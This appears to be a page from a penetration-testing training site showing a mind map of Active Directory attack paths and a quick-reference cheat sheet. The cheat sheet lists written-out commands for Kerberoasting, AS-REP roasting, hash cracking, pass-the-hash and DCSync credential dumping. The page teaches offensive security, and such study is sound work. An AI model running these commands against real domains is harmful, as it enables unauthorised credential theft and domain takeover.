Dashboard > Mind Maps > AD Attack Paths

AD Attack Paths

Common Active Directory attack techniques

Active Directory Attacks

Tip: Click on any node to see related information!

MAP Interactive Mind Map

graph TD A[Initial Foothold] --> B{Attack Vector} B --> C[Kerberoasting] B --> D[AS-REP Roasting] B --> E[Password Spraying] C --> F[Crack TGS Offline] D --> G[Crack AS-REP Offline] E --> H[Valid Credentials] F --> I[Service Account Access] G --> I H --> I I --> J[Lateral Movement] J --> K[Domain Admin] K --> L[DCSync]

MODULES Related Modules

Active Directory Attacks

Common AD attack techniques: Kerberoasting, AS-REP Roasting, Pass-the-Hash, DCSy...

Active Directory

REF Quick Reference

Kerberoasting

GetUserSPNs.py domain/user:pass -dc-ip 10.10.10.5 -request # Request TGS for Kerberoasting
hashcat -m 13100 krb5tgs.txt wordlist.txt # Crack TGS hashes

AS-REP Roasting

GetNPUsers.py domain/ -usersfile users.txt -dc-ip 10.10.10.5 # Check for AS-REP Roasting (no pre-auth)

Pass-the-Hash

impacket-psexec -hashes :NTHASH user@10.10.10.5 # Pass-the-Hash with PsExec
evil-winrm -i 10.10.10.5 -u user -H NTHASH # Pass-the-Hash with Evil-WinRM

DCSync

secretsdump.py domain/user:pass@10.10.10.5 # DCSync to dump domain hashes (needs rights)
Back to Mind Maps View Full Module